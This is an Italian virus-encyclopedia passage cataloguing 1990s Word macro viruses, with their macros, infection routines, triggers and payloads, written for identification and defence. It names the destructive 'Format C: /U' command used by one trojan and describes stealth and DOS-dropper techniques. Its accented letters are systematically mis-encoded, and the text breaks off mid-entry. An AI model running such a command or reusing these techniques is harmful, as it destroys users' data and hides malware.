Paese di origine: Georgia, Stati Uniti. Descrizione: Questo virus infetta Documenti di MS Word. Maddog contiene 6 macro di 4.209 Byte. "AutoOpen" "AutoClose" "AutoExec" "FileClose" "FcFinish" "AopnFinish" Quando viene aperto un documento infetto, MadDog infetta il modello di documento principale (NORMAL.DOT). Altri documenti sono infettati quando vengono chiusi con il comando "FileClose". Chiudendo i documenti, MadDog salva molte volte in "Temp1" , quindi salva il documento in uso. I documenti infetti sono salvati internamente in file di modello. Ci≥ Φ molto comune per i virus da macro. I documenti infetti contengono la stringa "MadDog". [Word.Tele] Nome del Virus: Word.Tele. Pseudonimo: LBYNJ:De, Telefonica, Tele, TEC, Tele-Sex. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 22.256 Byte (7 Macro). Sintomi: Infezione basata sul virus Kampana.3784 DOS, aggiunge testo ai documenti stampati. Paese di origine: Germania. Descrizione: Questo virus infetta Documenti di MS Word. LBYNJ Φ un altro virus da macro, che probabilmente Φ basato su altri virus da macro precedenti, come Xenixos. Le 7 macro criptate (Execute-Only) di LBYNJ sono di 22.256 Byte. "AutoExec" "AutoOpen" "DateiBeenden" "DateiDrucken" "DateiNeu" "DateiOeffnen" "Telefonica" La macro "AutoExec" include la routine di infezione del modello principale (NORMAL.DOT), che non si infetta quando Φ nel file WIN.INI. La stringa "0x0030303" Φ impostata "LBYNJ". "AutoExec" chiama inoltre la procedura distruttiva della macro "Telefonica". "AutoOpen" avvia la macro "AutoExec", ci≥ significa che il NORMAL.DOT Φ infettato quando viene aperto un documento infetto. LBYNJ usa la macro "Telefonica" per verificare precedenti infezioni. Non infetta il modello principale se la macro Φ ancora presente. I documenti sono infettati da "DateiBeenden" ("FileClose"), "DateiNeu" ("FileNew") e "DateiOeffnen" ("FileOpen"), poichΦ alla fine di "DateiOeffnen" ("FileOpen") la macro "Telefonica" Φ chiamata ancora. Nella sezione "Compatibility", la stringa "0x0030303" Φ impostata su "LBYNJ". LBYNJ possiede due procedure distruttive. La prima si trova nella macro "DateiDrucken" (FilePrint). Alla stampa di un documento, LBYNJ controlla l'ora di sistema ed in caso vi sia un valore inferiore a 10 nel campo dei secondi, aggiunge il seguente testo alla fine del documento stampato: " Lucifer by Nightmare Joker (1996) " La seconda procedura Φ attivata dalla macro "Telefonica" quando il campo dei secondi ha un valore di 0 o 1. ("Telefonica" Φ chiamata da "AutoOpen", "AutoExec" e "DateiOeffnen"). LBYNJ crea uno script di Debug (nome del file: TELEFONI.SCR) nella cartella "C:\DOS" che contiene il virus di DOS "Kampana.3784". Dopo aver creato il file script, LBYNJ esegue il file batch "TELEFONI.BAT" che usa il comando DOS "DEBUG.EXE" per convertire il file script del virus eseguibile basato sul DOS e lo avvia. (c) Stefan Kurtzhals [Word_Irish] Nome del Virus: Word.Irish. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 4.152 Byte (4 Macro). Sintomi: Mostra finestre. Paese di origine: USA. Descrizione: Questo virus infetta Documenti di MS Word. Irish contiene 4 macro di 4.152 Byte. "AutoOpen" "WordHelp" "AntiVirus" "WordHelpNT" Aprendo un documento infetto, Irish infetta il modello principale (NORMAL.DOT). Un modello di documento principale infetto contiene la macro "FileSave", anzichΦ "AutoOpen". Inoltre i documenti sono infettati quando viene usato il comando "FileSave". I documenti infetti sono convertiti internamente in file di modello. Ci≥ Φ molto comune per i virus da macro. Due delle macro, "WordHelp" e "WordHelpNT", non si eseguono automaticamente. Tuttavia, quando vengono eseguite manualmente dall'utente, cambiano il colore del desktop di Windows in verde. La macro "WordHelpNT" contiene una procedura che cerca di attivare lo screen saver e mostra il seguente messaggio: "Happy Saint Patties Day " Tuttavia la procedura sembra essere difettosa e non lavora con Windows 95 (Irish esiste solo in Microsoft Word). [Word_DMV] Nome del Virus: Word.DMV. Pseudonimo: Impost, Imposter.A, Imposter. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 907 Byte (2 Macro). Sintomi: Mostra una finestra con il testo: "DMV". Paese di origine: Inghilterra. Descrizione: Questo virus infetta Documenti di MS Word. DMV Φ basato sul virus Concept, con solo 2 macro non criptate. "FileClose" "DMV" (FileSave as in NORMAL.DOT) Il modello principale (NORMAL.DOT) diventa infetto quando viene chiuso un documento infetto e non sono presenti le macro "DMV" e "FileSave as". Quando Imposter.A copia la macro "DMV", la rinomina come "FileSave as" e mostra la seguente finestra: "DMV" Altri documenti vengono infettati quando Φ usato il comando "FileSave as". Imposter cambia i nuovi documenti infetti in file di modello. Ci≥ Φ comune a molti virus da macro. Il seguente testo Φ trovato in DMV, ma non viene mostrato: " just to prove another point " (Questo testo Φ basato sul virus Concept, che ha "this is enough to prove my point" nel proprio codice). Dato che usa i nomi delle macro inglesi, il virus DMV lavora solamente con la versione inglese di Microsoft Word. (c) Stefan Kurtzhals [Word_Hot] Nome del Virus: Word.Hot. Pseudonimo: WM.Hot. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 5.515 Byte (4 Macro). Sintomi: E' cancellato il testo nei documenti. Paese di origine: Sconosciuto. Descrizione: Questo virus infetta Documenti di MS Word. Hot Φ un virus complesso con 4 virus criptati. Quando Φ aperto un documento infetto il virus Φ attivato dalla macro AutoOpen. Alcuni replicanti di Hot mostrano anche il seguente messaggio d'errore: "Unable to load the specified library" Dapprima Hot spegne i suggerimenti di Word per essere sicuro di nascondere l'infezione del modello principale (NORMAL.DOT). Controlla anche il file "WINWORD6.INI" cercando il seguente testo: "QLHot". Se non esiste, Hot registra una "hot date", 14 giorni dopo. Se questa variabile non Φ giα stata impostata, il modello principale diventa infetto. La macro InsertPBreak/InsertPageBreak, come il suo nome suggerisce, inserisce un'interruzione di pagina nel documento corrente. E' anche usata dal virus per controllare che il documento sia giα stato infettato. Alcune macro sono rinominate quando vengono copiate con il comando "MacroCopy" di WordBasic: "AutoOpen" diventa "StartOfDoc" "DrawBringInFrOut" diventa "AutoOpen" "InsertPBreak" diventa "InsertPageBreak" "ToolsRepaginat" diventa "FileSave" Inoltre il modello principale contiene le seguenti macro: "FileSave" (simile a "ToolsRepaginat") "StartOfDoc" (simile a "AutoOpen") Hot usa anche funzioni speciali del file di Windows "KERNEL.EXE" (Win API). Usa API per trovare il percorso in Windows e per aprire i file che provvedono a semplici funzioni. Potrebbe essere notato che molte altre opzioni sono disponibili all'autore del virus. La procedura distruttiva, che Φ attivata al sopraggiungere della "hot date" regolata nella sezione "QLHot" nel file WINWORD6.ini, cancella il testo dai documenti attivi. Questa procedura Φ bypassata se Φ presente il file EGA5.CPI nella cartella "C:\DOS". Un commento nel codice virale spiega che questa Φ una "creatura" scritta per proteggere l'autore del virus ed i suoi amici. (c) Stefan Kurtzhals [Word-Hassle] Nome del Virus: Word.Hassle. Pseudonimo: Bogus. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 8.283 Byte (7 Macro). Sintomi: Mostra finestre. Paese di origine: USA. Descrizione: Questo virus infetta Documenti di MS Word. Hassle contiene 7 macro cifrate (Execute-Only) di 8.283 Byte. "AutoClose" "Tools\Macro" "Microsoft01" "Microsoft02" "Microsoft03" "Microsoft04" "Microsoft05" Quando viene aperto un documento infetto, Hassle infetta il modello principale (NORMAL.DOT). Hassle usa la tecnica macro stealth per nascondersi. Utilizza la macro "Tools\Macro" per rendere pi∙ difficile l'individuazione del documento infetto. Se l'utente seleziona un qualsiasi comando, il virus mostra le seguenti finestre e chiude Microsoft Word: " Out of Memory or System Resources" Hassle Φ uno dei pochi virus da macro non distruttivo. Infetta solo altri file e mostra la seguente finestra di testo: "Are you sure to Quit?" Questo avviene solo raramente, con una probabilitα del 5%. Un'altra procedura chiede all'utente di registrare il software Microsoft. Hassle accetta solo una risposta, che Φ la seguente: "Bill Gates", "Microsoft" e "666". Ogni volta che l'utente seleziona il comando Tools/Macro, Hassle mostra il seguente messaggio nella parte bassa dello schermo: " Microsoft Word Assistant Version 6.2". [Word_HiSexy] Nome del Virus: Word.HiSexy. Pseudonimo: Guess, Teaside, Phantom. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 1.126 Byte (1 Macro). Sintomi: Viene stampato od inserito testo in documenti. I documenti aperti vengono chiusi immediatamente. Paese di origine: Germania. Descrizione: Questo virus infetta Documenti di MS Word. Hisexy ha solo una macro di 1.126 Byte. "AutoOpen" Hisexy ha una caratteristica inusuale paragonato agli altri virus da macro. Usa solo la macro Execute-Only, "AutoOpen," e non usa macro comuni come FileSave as per infettare altri file. Tutti i procedimenti di infezione per infettare il NORMAL.DOT ed i documenti sono nella macro "AutoOpen". Quando viene aperto un documento infetto, Hisexy controlla che le variabili del documento siano impostate su "populated." Se "NO", un nuovo modello principale (NORMAL.DOT) Φ creato e la macro del virus "AutoOpen" Φ copiata nel nuovo documento. Fatto questo, le variabili sonoregolate su "populated" per marcare un file come infetto. Se la variabile Φ giα regolata, il virus infetta il nuovo documento trasferendo la macro "AutoOpen" usando il comando MakroCopy. Guess Φ il primo virus da macro che usa le variabili di un documento come meccanismo di controllo per altri documenti infetti. A causa di un errore nel codice del programma, il virus non si replica correttamente. Da un numero scelto casualmente (tra 0 e 100), Hisexy attiva diverse procedure distruttive. Cambia la misure dei caratteri in uso o crea un nuovo documento (NORMAL.DOT) con il seguente testo: "The word is out." "The word is spreading..." "The Phantom speaks..." "Sedbergh" "is CRAP" "The word spreads..." Il testo viene stampato. Il seguente testo Φ inserito nel documento attivo a seconda del numero scelto: "This school is really good. NOT" "We all love Mr. Hirst." "M.R.Beard" "This network is REALLY fast." "Hi Sexy!" "Who's been typing on my computer?" "Well helloooo there!" "Guess who?" Una volta ogni tanto, il documento attivo Φ chiuso da Guess. Dato che Guess usa solo la "AutoOpen" lavora anche con altre versioni di Microsoft Word come la versione tedesca. (c) Stefan Kurtzhals [Word_Goldfish] Nome del Virus: Word.Goldfish. Pseudonimo: Fishfood. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 1.906 Byte (2 Macro). Sintomi: Mostra finestre. Paese di origine: USA. Descrizione: Questo virus infetta Documenti di MS Word. Goldfish contiene 2 macro cifrate (Execute-Only) di 1.906 Byte. "AutoOpen" "AutoClose" Quando viene aperto un documento infetto, Goldfish infetta il modello principale (NORMAL.DOT). Altri documenti sono infettati quando vengono aperti ("AutoOpen"). I documenti infetti sono convertiti internamente in file di modello. Ci≥ Φ molto comune per i virus da macro. Goldfish Φ uno dei pochi virus da macro non distruttivo. Infetta solo altri file e mostra una finestra con il seguente testo: "I am the goldfish, I am hungry, feed me." Il messaggio non scompare finchΦ l'utente non digita una risposta accettabile. Le risposte possibili sono: "fishfood", "worms", "worm", "pryme" e "core". [Word_Friendly] Nome del Virus: Word.Friendly. Pseudonimo: Friends, Friendly:De. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 9.867 (20 Macro). Sintomi: Mostra un testo. Paese di origine: Germania. Descrizione: Questo virus infetta Documenti di MS Word. Friendly sembra essere dello stesso autore del virus <LBYNJ>, da quando include la referenza "Nightmare Joker." Lo stesso autore ha scritto molti altri virus da macro ed Φ l'autore del primo kit per un generatore di virus da macro. Friendly Φ un complesso virus da macro contenente 20 macro: "Abbrechen" "AutoExec" "AutoOpen" "Cancel" "DateiBeenden" "DateiNeu" "DateiOeffnen" "DateiSchliessen" "DateiSpeichern" "DateiSpeichernUnter" "ExtrasMacro" "ExtrasMakro" "Fast" "FileExit" "FileNew" "FileOpen" "FileSave" "FileSave as" "Infizieren" "Talk" Friendly rappresenta lo sforzo di scrivere un virus per pi∙ di un linguaggio. Tutti i nomi delle macro sono tradotti ed internamente sono usati i comandi delle macro inglesi. Osservando le correnti impostazioni (DM - German Marks), Friendly rileva se Φ stato avviato sulla versione tedesca di Microsoft Word. Dimostra come l'autore non avesse una copia attuale della versione inglese di Word dato che alcuni nomi di macro sono stati tradotti non correttamente. (ExtrasMacro invece di Tools\Macro). Friendly tuttavia non lavora con altre versioni di Word oltre quella tedesca. Quando viene aperto un documento infetto, Friendly cerca di infettare il modello principale (NORMAL.DOT). Controlla che il modello principale abbia avuto un'infezione precedente cercando il testo "Friendly", Author = Nightmare". Dopo che le macro sono state trasferite, la procedura distruttiva Φ chiamata dalla macro "Fast". Friendly infetta altri documenti ogni volta che ne vengono creati di nuovi, che viene annullata un'azione, ed ogni volta che i documenti sono aperti, chiusi, salvati o escono da Word. Come Φ comune per molti virus da macro, un documento infetto Φ convertito internamente in un file di modello. Friendly non controlla eventuali infezioni del documento precedenti. Sovrascrive semplicemente le macro esistenti. La procedura distruttiva, dentro alla macro "Fast", si attiva quando l'ora di sistema ha il valore dei secondi minore di 2. Friendly quindi crea uno script di debug nella cartella C:\DOS e la segna eseguibile usando il comando DOS DEBUG.EXE. In pi∙, Friendly immette informazioni in AUTOEXEC.BAT, cosi che il virus basato sul DOS sia avviato dopo il sucesivo riavvio. Il virusbasato sul DOS dentro a Friendly Φ lungo 395 Byte ed Φ un virus companion residente in memoria cifrato con CryptCOM. Friendly mostra il seguente testo il giorno 1 gennaio: " Ein gutes neues Jahr !" ed infetta i file con estensione *.EXE in esecuzione. Sono creati dei nuovi file con estensione *.COM con lo stesso nome dei file di estensione *.EXE e con gli attributi: "READ-ONLY" e "HIDDEN" Se il virus Φ attivo, viene mostrato il seguente testo quando un utente cerca di vedere la lista delle macro: "You can't do that!" "I'm very anxious!" "Hello my friend!" "<< Friends >> Virus" (traduzione:) "Du kannst das nicht tun!" "Ich bin sehr aengstlich!" "Hallo mein Freund!" "<< Friends >> Virus" Dopo il giorno 1 maggio, Friendly mostra il seguente testo quando infetta dei documenti per l prima volta (eccetto per il NORMAL.DOT): (traduzione:) "Hello my Friend!" "I'm the << Friends >> Virus and how are you?" "Can you give me your name, please?" "Hello .... I have a good and a bad message for you! The bad message is that" "you have now a Virus on your Harddisk and the good message is that I'm "harmless and useful. Press OK!" "If you don't kill me, I will insert a programme in your AutoExec.bat thats "your Keyboard accelerated. Please .... don't kill me. Goodbye!" I nomi inseriti vengono poi mostrati. Tutto il testo viene mostrato una sola volta. Friendly mostra anche diversi messaggi d'errore di Wordbasic come: "Unbekannte(r) Befehl, Subroutine oder Funktion" o "Syntaxfehler" (c) Stefan Kurtzhals [Word_FMT.Trojan] Nome del Virus: Word.FMT.Trojan. Pseudonimo: FormatC, Trojan.FC. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 81 Byte (1 Macro). Sintomi: C:\ Φ formattato. Paese di origine: Inviato su Usenet. Descrizione: Questo virus infetta Documenti di MS Word. FormatC consiste in solo una macro: "AutoOpen" FormatC non Φ un virus ma un cavallo di Troia, che non si replica. Questo cavallo di Troia contiene solo una macro criptata, che Φ "AutoOpen". Quando viene aperto un documento infetto, il cavallo di Troia avvia la procedura distruttiva, che scrive " Format C: /U " in una minuscola casella di DOS quindi formatta il drive C. E' difficile che si diffonda dato che non infetta altri file. FormatC fu anche immesso su Usenet, determinando la perdita di dati a qualche utente. (c) Stefan Kurtzhals [Word_Doggie] Nome del Virus: Word.Doggie. Pseudonimo: Nessuno. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 610 Byte (3 Macro). Sintomi: Mostra finestre. Paese di origine: USA. Descrizione: Questo virus infetta documenti di MS Word. Doggie contiene 3 macro di 610 Byte. "Doggie" "AutoOpen" "FileSave as" Aprendo un documento infetto, Doggie infetta il modello principale (NORMAL.DOT). Alri documenti sono infettati usando il comando "FileSave as". I documenti infetti vengono convertiti internamente in file di modello, evenienza molto comune per un virus da macro. Doggie Φ uno dei pochi virus da macro non distruttivo. Infetta solo altri file e mostra il seguente mesaggio: "Doggie " Dato che Doggie ha nomi di macro in inglese ("FileSave as") Lavora solo con la versione inglese di Microsoft Word. [WORD_WW2DEMO] Nome del Virus: Word.WW2Demo. Pseudonimo: WM.DMV. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 3.002 Byte (1 Macro). Sintomi: Mostra messaggi. Paese di origine: Stati Uniti, anche immesso in Usenet. Descrizione: Questo virus infetta Documenti di MS Word. Demonstration contiene 1 di 3.002 Byte. "AutoClose" DMV fu il primo virus da macro scritto da Joel McNamara, che pubblic≥ un articolo dettagliato sui virus da macro. Si suppone che DMV abbia dato spunto ad altri autori di virus per scrivere virus da macro di Word. Dato che l'articolo non fu pubblicato prima della scoperta di Concept, gli autori di virus furono spronati ad utilizzare altre tecniche. Joel McNamara pubblic≥ inoltre un virus da macro di Excel, per≥ non operativo (Excel.DMV.A) Quando viene chiuso un documento infetto, DMV infetta il modello principale (NORMAL.DOT). Alri documenti sono infetttati quando vengono chiusi. Vengono anche convertiti internamente in file di modello, evenienza molto comune per un virus da macro. Infettando, Demonstration mostra la seguente stringa sullo schermo: " Counting global macros" "AutoClose macro virus is already installed in NORMAL.DOT." "Infected NORMAL.DOT with a copy of AutoClose macro virus. " "AutoClose macro virus already present in this document." "Saved current document as template." "Infected current document with copy of AutoClose macro virus." " Macro virus has been spread. Now execute some other code (good, bad, or indifferent)." [WORD_Divina] Nome del Virus: Word.Divina. Pseudonimo: Roberta. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 2.357 Byte (1 Macro). Sintomi: Beep e pause quando vengono mostrati i messaggi. Mostra finestre di testo. Paese di origine: Italia. Descrizione: Questo virus infetta Documenti di MS Word. Divina fu probabilmente scritto dall'autore del virus da macro Date e si Φ diffuso a Malta, Spagna ed Italia Divina contiene solo una macro criptata (Execute-Only) di 2.357 Byte. "AutoClose" Divina infetta il modello principale (NORMAL.DOT) quando viene aperto e poi chiuso un documento infetto. Altri documenti sono infettati quando sono chiusi usando il comando "AutoClose". Divina ha due procedure. La prima controlla l'ora di sistema, ed in caso di un valore 17 nel campo dei minuti, mostra una serie di finestre. Tra una e l'altra fa una pausa ed emette un beep. Sono mostrate le seguenti finestre: "ROBERTA TI AMO!" "Virus 'ROBERTA' is running. Hard Disk damaged. Start antivirus?" "Exit from system and low level format are recommended." "Exit from System?" Dopo l'ultimo messaggio Divina cerca di chiudere Windows. La seconda pocedura Φ attivata il giorno 21 maggio. Divina controlla ancora l'ora di sistema e se il documento Φ stato chiuso tra il decimo ed il ventesimo minuto o tra il quarantesimo ed il cinquantesimo, mostra altre 2 finestre. "DIVINA IS THE BEST!" seguito da un'altra finestra con un messaggio in italiano. Divina non contiene procedure distruttive. L'unico problema con Divina Φ di indurre al panico l'utente formattando a basso livello il suohard disk. [Word_Date] Nome del Virus: Word.Date. Pseudonimo: AntiDMV, Infezione. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 1.042 Byte (1 Macro). Sintomi: Rimozione della macro AutoClose dai documenti. Paese di origine: Stati Uniti. Descrizione: Questo virus infetta Documenti di MS Word. Date fu probabilmente scritto dall'autore del virus Divina. Contiene solo una macro criptata (Execute-Only) di 1.042 Byte. "AutoOpen" Quando viene aperto un documento infetto, Date infetta il modello di documento principale (NORMAL.DOT). Altri documenti sono infettati quando vengono aperti. L'infezione avviene solo il giorno 1 giugno 1996. Quando sarα letto questo articolo, Date non dovrebbe essere una minaccia per nessuno anche se ci potrebbero essere in giro dei documenti infetti. Date Φ anche conosciuto con il nome AntiDMV. Fu scelto questo nome perchΘ rimuove la macro "AutoClose" dai documenti. Il virus "DMV" possiede solamente una macro "AutoClose" che pu≥ tuttavia essere rimossa dal virus Date. [WORD_CONCEPT-G] Nome del Virus: Word_Concept.G. Pseudonimo: Parasite, Parasite 0.8, P-Site. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 3.670 Byte (7 Macro) nei file con estensione *.DOC, 3.450 Byte (7 Macro) nel modello principale. Sintomi: Mostra finestre. Modifica i documenti. Paese di origine: Stati Uniti. Descrizione: Questo virus infetta Documenti di MS Word. Concept.G contiene 7 macro criptate (Execute-Only) di 3.670 Byte. "K" "A678" "Para" "Site" "I8U9Y13" "Paylaod" "AutoOpen" Concept .G si attiva quando viene aperto un documento infetto (AutoOpen). Una volta attivato, Concept.G infetta il modello principale (NORMAL.DOT). I documenti infetti vengono convertiti internamente in file di modello, evenienza molto comune per un virus da macro. Concept.G possiede diverse procedure. La prima sostituisce le seguenti parole nei documenti infetti: "and" con "not" La seconda procedura Φ un po' pi∙ ampia. Concept.G controlla la data di sistema per un valore specifico nella sezione dei giorni. In caso sia 16 (ogni giorno 16 del mese) attiva la propria procedura. Quindi sostituisce le seguenti letter\parole nei documenti infetti: "." (dot) con "," (comma) "and" con "not" "a" con "e" Come il codice di Concept.G, Φ una beta release. Invece di versione 1.0 (Concept.F) Φ la versione 0.8. [WORD_CONCEPT] Nome del Virus: Word_Concept. Pseudonimo: Prank, WW6Macro, WBMV, WW6Infector, Winword. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 1.968 Byte (4 Macro). Sintomi: Mostra una finestra con un "1" . Paese di origine: Stati Uniti. Descrizione: Questo virus infetta Documenti di MS Word. Concept fu il primo virus da macro trovato "In-the-Wild". Fu scoperto in luglio-agosto 1995. Adesso Φ il virus pi∙ comune. I virus da macro, come Concept, non dipendono dal sistema operativo. Lavorano con Windows, Windows 95, Windows NT e Macintosh. I virus da macro di Word lavorano solamente fino a quando Microsoft Word Φ attivo. Tuttavia possono procurare danni permanenti (per esempio cancellare importanti file di sistema). Concept.A contiene 4 macro non criptate di 1.968 Byte. "AAAZAO" "AAAZFS" "AutoOpen" "Payload" Concept.A si attiva quando viene aperto un documento infetto (AutoOpen). Una volta attivato, Concept.A controlla eventuali precedenti infezioni del modello di documento principale (normal.dot). Fa questo cercando le macro "Payload" e "FileSave as". Se nessuna delle macro Φ presente, Concept.A copia le sue macro. nel modello principale usando il comando "MacroCopy". La macro "AAAZFS" Φ salvata con il nome "FileSave as". Un file infetto NORMAL.DOT contiene le seguenti macro: "AAAZAO" "AAAZFS" "FileSave as" "Payload" Dopo aver infettato il modello di documento principale, Concept penetra nel file Win.ini. Colloca "WW6I=1" e compare una finestra contenente un "1". Concept.A non contiene procedure distruttive, anche se contiene una macro chiamata "Payload". La macro "Payload" Φ vuota eccetto per la seguente informazione: "That's enough to prove my point" Il testo seguente Φ presente nel codice del virus, ma non Φ mai apparso: "Payload is just for fun" Dato che Concept.A usa macro con nomi in inglese, lavora solo con la versione inglese di Microsoft Word. Concept.A fu accidentalmente distribuito in diversi CD (incluso un CD di Microsoft). Questa Φ una delle ragioni per cui Concept.A Φ attualmente il virus pi∙ comune. (c) Stefan Kurtzhals [Winword_Colors] Nome del Virus: Winword.Colors. Pseudonimo: Rainbow, Colo-a. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 6.470 Byte (9 Macro). Sintomi: Cambia il colore degli oggeti di Windows . Paese di origine: Portogallo. Descrizione: Questo virus infetta Documenti di MS Word. Colors Φ un complesso virus da macro con 9 macro Execute-Only: "AutoClose" "AutoExec" "AutoOpen" "FileExit" "FileNew" "FileSave" "FileSave as" "macros" "Tools\Macros" Colors Φ il primo virus da macro che pu≥ giα infettare, anche quando tutte le Auto-Macro sono disattivate. Inoltre cerca di nascondersi in modo che l'utente non possa usare il comando "Tools/Macro" per cercare la lista delle macro e scoprire cos∞ il virus. Il virus viene eseguito quando si cerca di farlo. Invece, bisognerebbe usare il comando File/Templates/Organizer/Macros per rilevare e cancellare le macro alterate. Colors ha anche una modalitα di Debug, in cui le macro non vengono salvate come Execute-Only (criptate). Con l'attivazione da una delle sue macro (ad eccezione di AutoExec), Colors cerca di infettare il modello di documento principale (normal.dot), attraverso cui spegne i suggerimenti di Microsoft Word prima di salvare. Colors controlla che tutte le macro siano presenti nel modello principale. Se "NO", trsferisce le sue sostituendole con quelle presenti. Il modello di documento principale diviene infetto quando un documento infetto viene aperto, salvato, chiuso o si esce da Microsoft Word. Altri documenti divengono infetti quando un file viene creato (File/Nuovo) o salvato (File/Salva, File/Salva con nome). Colors.A controlla ancora la lista delle macro per vedere che il documento sia giα stato infettato. La procedura distruttiva, come altre funzioni, Φ nella macro "macros". La procedura (una sub-routine "objective") Φ attivata dalla chiamata di ogni macro, eccetto AutoExec. AutoExec, che Φ vuota. Fu probabilmente fatta per sovrascrivere una esistente macro anti-virus. Colors.A crea una variabile nella sezione [Windows] di Win.ini con il nome "countersu," che conteggia partendo da zero. Dopo ogni 300 chiamate, Colors cambia il colore delle linguette di 21 elementi del desktop di Windows. Lo sfondo, i tasti ed i bordi avranno dei nuovi colori selezionati a caso, conferendo al desktop un look originale. Questo virus non lavora su Microsoft Word per Macintosh. (c) Stefan Kurtzhals [WINWORD_COLORS.D] Nome del Virus: Winword.Colors.D. Pseudonimo: Colo-d, WM.Colors. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 19.688 Byte (9 Macro). Sintomi: Mostra messaggi d'errore. Paese di origine: Sconosciuto. Descrizione: Questo virus infetta Documenti di MS Word. Colors.D Φ un complesso virus da macro con 9 macro Execute-Only. "AutoClose" "AutoExec" "AutoOpen" "FileExit" "FileNew" "FileSave" "FileSave as" "macros" "Tools\Macros" Colors.D sembra essere una combinazione tra il virus Colors.A e la soluzione per virus da macro Microsoft "Scanprot." Si raccomanda di non usare il comando Tools/Macro per cercare le macro di Colors.B. Il virus viene eseguito dopo che si cerca di fare questo. Bisogna usare invece il comando File/Templates/Organizer/Macros per individuare, cancellare o altrare le macro. Anche se Colors.D ha una porzione di anti-virus nel proprio codice, Φ in grado di diffondersi ed infettare il modello principale (NORMAL.DOT) e nuovi documenti. Colors.D mostra i seguenti messaggi d'errore: "Unknown Command, Subroutine, or Function" [WORD_CLOCK] Nome del Virus: Word_Clock. Pseudonimo: Clock:De, WM.Extra. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 3.795 Byte (11 Macro). Sintomi: Mostra finestre. Paese di origine: USA. Descrizione: Questo virus infetta Documenti di MS Word. Clock contiene 11 macro criptate (Execute-Only) di 3.795 Byte. "Action" "Oeffnen" "AutoExec" "AutoOpen" "Speichern" "Extrasmakro" "DateiSchliessen" "Datumunduhrzeit" "Dateidokvorlagen" "Dateiallesspeichern" Clock utilizza la tecnica macro stealth per nascondersi. Usa "ExtrasMakro" ("Tools\Macro") e "DateiDokVorlagen" ("File Templates") per rendere pi∙ dificile il rilevamento di un documento infetto. Quando viene aperto un documento infetto, Clock infetta il modello principale (NORMAL.DOT). Per nascondere l'infezione chiude i suggerimenti di Word prima di salvare il modello principale modificato. I documenti infetti sono convertiti internamente in file di modello, evenienza molto comune per un virus da macro. Quando viene aperto un documento infetto dopo il giorno 26 di ogni mese, Clock mostra una finestra contenente l'ora. Inoltre attiva una delle sue procedure distruttive, che imposta il campo dei secondi dell'ora di sistema sul valore 33. Clock fa ci≥ ogni 2 o 3 minuti, con il risultato che l'ora di sistema perde precisione. La seconda procedura si avvia nel 1997. Clock rileva l'ora di sistema ed in caso il valore dei minuti sia minore di 5, attiva le macro "FileOpen" e "FileSave". Questo pu≥ accadere solamente nei seguenti giorni del mese: 1 2 13 21 27. Dato che Clock i nomi delle macro in tedesco, lavora solamente con la versione tedesca di Microsoft Word. [WORD_BueroNeu] Nome del Virus: Word.BueroNeu. Pseudonimo: Buero:De, BuroNeu, Bureau. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 697 Byte (2 Macro). Sintomi: Cancella i file. Rinomina i file. Paese di origine: Germania. Descrizione: Questo virus infetta Documenti di MS Word. Buero possiede due macro criptate (Execute-Only) di 697 Byte. "AutoOpen" "BueroNeu" Quando viene aperto un documento infetto, Buero infetta il modello principale (NORMAL.DOT). Il modello principale include la macro "DateiSpeichern" invece di "AutOpen." Altri documenti si infettano con il comando "DateiSpeichern" ("FileSave"). I documenti infetti sono convertiti internamente in file di modello, evenienza molto comune per i virus da macro. Infettando, Buero attiva le proprie procedure distruttive. Dopo il giorno 15 agosto 1996, Buero rinomina il file di sistema "IO.SYS" con "IIO.SYS." Questo rende il computer inavviabile. La seconda procedura distruttiva cerca i file C:\*.DOC e li cancella. Dato che Buero possiede i nomi delle macro in tedesco ("DateiSpeichern"), lavora solamente con la versione tedesca di Microsoft Word. [WORD_BOOM] Nome del Virus: Word.Boom. Pseudonimo: Boombastic, Boom:De. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 2.863 Byte (4 Macro). Sintomi: La procedura si attiva alle ore 13:13:13 ogni giorno 13 dopo febbraio 1996. Viene rinominata la struttura del menu di Word ed Φ creato e stampato un nuovo testo del modello principale. Paese di origine: Germania. Descrizione: Questo virus infetta Documenti di MS Word. Boom Φ un virus da macro con 4 macro criptate (Execute-Only). "AutoOpen" "AutoExec" "DateiSpeichernUnter" "System" Oltre a Xenixos, Boom Φ il secondo virus da macro scritto per la versione tedesca di Microsoft Word. Boom Φ diverso dagli altri virus da macro conosciuti e non si sa se Φ una variante di un altro virus da macro. Boom lavora solamente con la versione tedesca di Microsoft Word. Altre versioni permettono a Boom di infettatre il modello principale (Normal.dot) e non i documenti. Questo limita la diffusione di Boom agli utenti tedeschi di Word. Nella macro "AutoOpen" c'Φ la routine di infezione per il modello principale (Normal.dot). Ogni volta che viene aperto un documento infetto, Normal.dot diventa infetto. Boom non usa il comando "KopiereMakro", usa invece "Organisiere.Kopiere." Prima di trasferire le proprie macro, l'opzione FastSave viene disabilitata. Inoltre, Boom bypassa i suggerimenti di Word ogni volta che viene salvato un Normal.dot modificato. La macro "AutoExec," (chiamata ad ogni avvio di Microsoft Word), ha un meccanismo di rilevamento dell'ora che chiama le macro "System" ogni volta che l'ora segna le 13:13:13 (ogni giorno 13 del mese). La macro "System" contiene la procedura distruttiva. "AutoExec" Φ anche chiamata dalle macro del virus "AutoOpen"e "DateiSpeichernUnter" quando viene aperto o salvato un documento. La procedura distruttiva rinomina la struttura del menu di Word: Datei -> Mr.Boombastic Bearbeiten -> and Ansicht -> Sir WIXALOT Einfuegen -> are Format -> watching Extras -> you Tabelle -> ! Fenster -> ! Hilfe -> ! Tra ogni 